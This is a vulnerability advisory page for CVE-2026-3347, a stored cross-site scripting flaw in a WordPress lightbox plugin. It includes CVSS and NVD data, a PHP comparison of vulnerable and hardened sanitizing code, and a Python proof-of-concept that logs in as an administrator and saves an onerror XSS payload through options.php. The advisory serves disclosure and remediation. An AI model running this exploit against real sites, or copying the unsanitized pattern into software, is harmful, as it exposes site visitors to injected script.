Security Vulnerability Report
CVE-2026-3347 CVSS 5.5 MEDIUM

CVE-2026-3347

Published: 2026-03-21 04:17:22
Last Modified: 2026-04-24 16:27:44

Description

The Multi Functional Flexi Lightbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `arv_lb[message]` parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This is due to the `arv_lb_options_val()` sanitize callback returning user input without any sanitization, and the stored `message` value being output in the `genLB()` function without escaping. This makes it possible for authenticated attackers, with Administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses a page or post with the lightbox enabled.

Note on the required privilege level: on a single-site WordPress install, Administrators normally hold the `unfiltered_html` capability and can already place arbitrary HTML in post content, so the additional exposure here is on multisite installs (where only Super Admins hold `unfiltered_html`) and on sites that define `DISALLOW_UNFILTERED_HTML`. In those environments a compromised or rogue Administrator account gains a script-execution path it should not have, and the injected script runs in the browser of every visitor who loads a page with the lightbox enabled, including other logged-in users; this is reflected in the vector's Scope: Changed and explains the MEDIUM rating despite PR:H.
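The two defects the description names (a sanitize callback that returns its input unchanged, and an output path that echoes the stored value raw) side by side with a hardened form, as an added illustration that is not the plugin's own code. The names `arv_lb_options_val()`, `genLB()`, the `arv_lb` option and the `arv_lb_options` settings group are taken from the advisory and the PoC; the function bodies, the markup and the choice of `wp_kses_post()` are assumptions made for this example.

```php
<?php
// Added illustration of CVE-2026-3347's bug class. Not the plugin's code:
// only the names come from the advisory, the bodies are assumed.

// Vulnerable pattern: the Settings API sanitize callback hands the array
// straight back, so 'message' reaches wp_options exactly as submitted.
function arv_lb_options_val_vulnerable( $input ) {
    return $input;
}

// Hardened pattern: allow-list the known keys and sanitize each one.
// wp_kses_post() keeps the limited HTML that post content may contain and
// drops <script> and event-handler attributes such as onerror.
function arv_lb_options_val_fixed( $input ) {
    $clean = array();
    $clean['message'] = isset( $input['message'] )
        ? wp_kses_post( (string) $input['message'] )
        : '';
    return $clean;
}

// Registration: options.php runs the sanitize callback on every save, so a
// correct callback protects the stored value regardless of who submits it.
add_action( 'admin_init', function () {
    register_setting( 'arv_lb_options', 'arv_lb', array(
        'sanitize_callback' => 'arv_lb_options_val_fixed',
    ) );
} );

// Output side, vulnerable form: the stored value is concatenated into the
// lightbox markup unescaped, so anything that made it into wp_options runs.
function genLB_vulnerable() {
    $opts = get_option( 'arv_lb', array() );
    echo '<div class="arv-lb-message">' . $opts['message'] . '</div>';
}

// Output side, hardened form: filter again at output time (defence in depth),
// so values stored before the fix, or written directly to the database,
// still cannot become live script.
function genLB_fixed() {
    $opts    = get_option( 'arv_lb', array() );
    $message = isset( $opts['message'] ) ? (string) $opts['message'] : '';
    echo '<div class="arv-lb-message">' . wp_kses_post( $message ) . '</div>';
}
```

With this pair, a submitted value of `<img src=x onerror=alert(document.cookie)>` is stored and rendered as `<img src="x" />`; the `onerror` attribute is not on the allow-list. If the message is meant to be plain text rather than formatted HTML, `sanitize_text_field()` on input and `esc_html()` on output are the tighter choice. Note that a fix to the callback alone does not clean values already saved, which is why the output filter matters during remediation.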

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data available (NVD vulnerability status: Deferred).

Multi Functional Flexi Lightbox (WordPress plugin) <= 1.2 (all versions up to and including 1.2)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# WordPress Multi Functional Flexi Lightbox <= 1.2 Stored XSS PoC (CVE-2026-3347)
# Target: the 'arv_lb[message]' parameter in the plugin settings.
# Precondition: the attacker already holds Administrator-level privileges.
import re
import sys

import requests

# Configuration
base_url = "http://example.com"
settings_page = f"{base_url}/wp-admin/admin.php?page=multi-functional-flexi-lightbox"
login_url = f"{base_url}/wp-login.php"
# Settings API forms (option_page / action=update) are processed by options.php,
# not by the plugin's own admin page.
options_url = f"{base_url}/wp-admin/options.php"
username = "admin"
password = "password"

session = requests.Session()


# 1. Authenticate to WordPress
def login():
    login_data = {
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": settings_page,
    }
    session.post(login_url, data=login_data)
    # A successful login sets a wordpress_logged_in_* cookie. Checking the
    # response body for "wp-admin" is unreliable because wp-login.php mentions
    # it on failure as well.
    if any(name.startswith("wordpress_logged_in_") for name in session.cookies.keys()):
        print("[+] Login successful")
    else:
        print("[-] Login failed")
        sys.exit(1)


# 2. Exploit the Stored XSS
def exploit():
    # Fetch the settings page to read the Settings API nonce (_wpnonce), which
    # options.php requires before it will run the update.
    page = session.get(settings_page)
    match = re.search(r'name="_wpnonce"[^>]*value="([^"]+)"', page.text)
    if not match:
        print("[-] Could not find _wpnonce on the settings page")
        sys.exit(1)
    nonce = match.group(1)

    # The vulnerable parameter is arv_lb[message]. The sanitize callback stores
    # it verbatim and genLB() later echoes it unescaped on every page or post
    # with the lightbox enabled.
    # Payload: simple alert to demonstrate execution.
    payload_data = {
        "arv_lb[message]": "<img src=x onerror=alert(document.cookie)>",
        "submit": "Save Changes",
        "option_page": "arv_lb_options",
        "action": "update",
        "_wpnonce": nonce,
        "_wp_http_referer": "/wp-admin/admin.php?page=multi-functional-flexi-lightbox",
    }
    response = session.post(options_url, data=payload_data)
    if response.ok:
        print("[+] Payload sent. Check the plugin settings or view a post with the lightbox.")
    else:
        print(f"[-] Request failed with status {response.status_code}")


if __name__ == "__main__":
    login()
    exploit()

References

https://plugins.trac.wordpress.org/browser/multi-functional-flexi-lightbox/tags/1.2/options.php#L94
https://plugins.trac.wordpress.org/browser/multi-functional-flexi-lightbox/tags/1.2/sp.php#L37
https://plugins.trac.wordpress.org/browser/multi-functional-flexi-lightbox/trunk/options.php#L94
https://plugins.trac.wordpress.org/browser/multi-functional-flexi-lightbox/trunk/sp.php#L37
https://www.wordfence.com/threat-intel/vulnerabilities/id/a4c0b14a-d039-4008-a433-ab3605e2612c?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-3347",
    "sourceIdentifier": "security@wordfence.com",
    "published": "2026-03-21T04:17:21.730",
    "lastModified": "2026-04-24T16:27:44.277",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Multi Functional Flexi Lightbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `arv_lb[message]` parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This is due to the `arv_lb_options_val()` sanitize callback returning user input without any sanitization, and the stored `message` value being output in the `genLB()` function without escaping. This makes it possible for authenticated attackers, with Administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses a page or post with the lightbox enabled."
      },
      {
        "lang": "es",
        "value": "El plugin Multi Functional Flexi Lightbox para WordPress es vulnerable a cross-site scripting almacenado a través del parámetro `arv_lb[message]` en todas las versiones hasta la 1.2, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto se debe a que la función de callback de sanitización `arv_lb_options_val()` devuelve la entrada del usuario sin ninguna sanitización, y el valor `message` almacenado se muestra en la función `genLB()` sin escape. Esto hace posible que atacantes autenticados, con acceso de nivel de Administrador, inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página o entrada con el lightbox habilitado."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "security@wordfence.com",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "security@wordfence.com",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/multi-functional-flexi-lightbox/tags/1.2/options.php#L94", "source": "security@wordfence.com"},
      {"url": "https://plugins.trac.wordpress.org/browser/multi-functional-flexi-lightbox/tags/1.2/sp.php#L37", "source": "security@wordfence.com"},
      {"url": "https://plugins.trac.wordpress.org/browser/multi-functional-flexi-lightbox/trunk/options.php#L94", "source": "security@wordfence.com"},
      {"url": "https://plugins.trac.wordpress.org/browser/multi-functional-flexi-lightbox/trunk/sp.php#L37", "source": "security@wordfence.com"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a4c0b14a-d039-4008-a433-ab3605e2612c?source=cve", "source": "security@wordfence.com"}
    ]
  }
}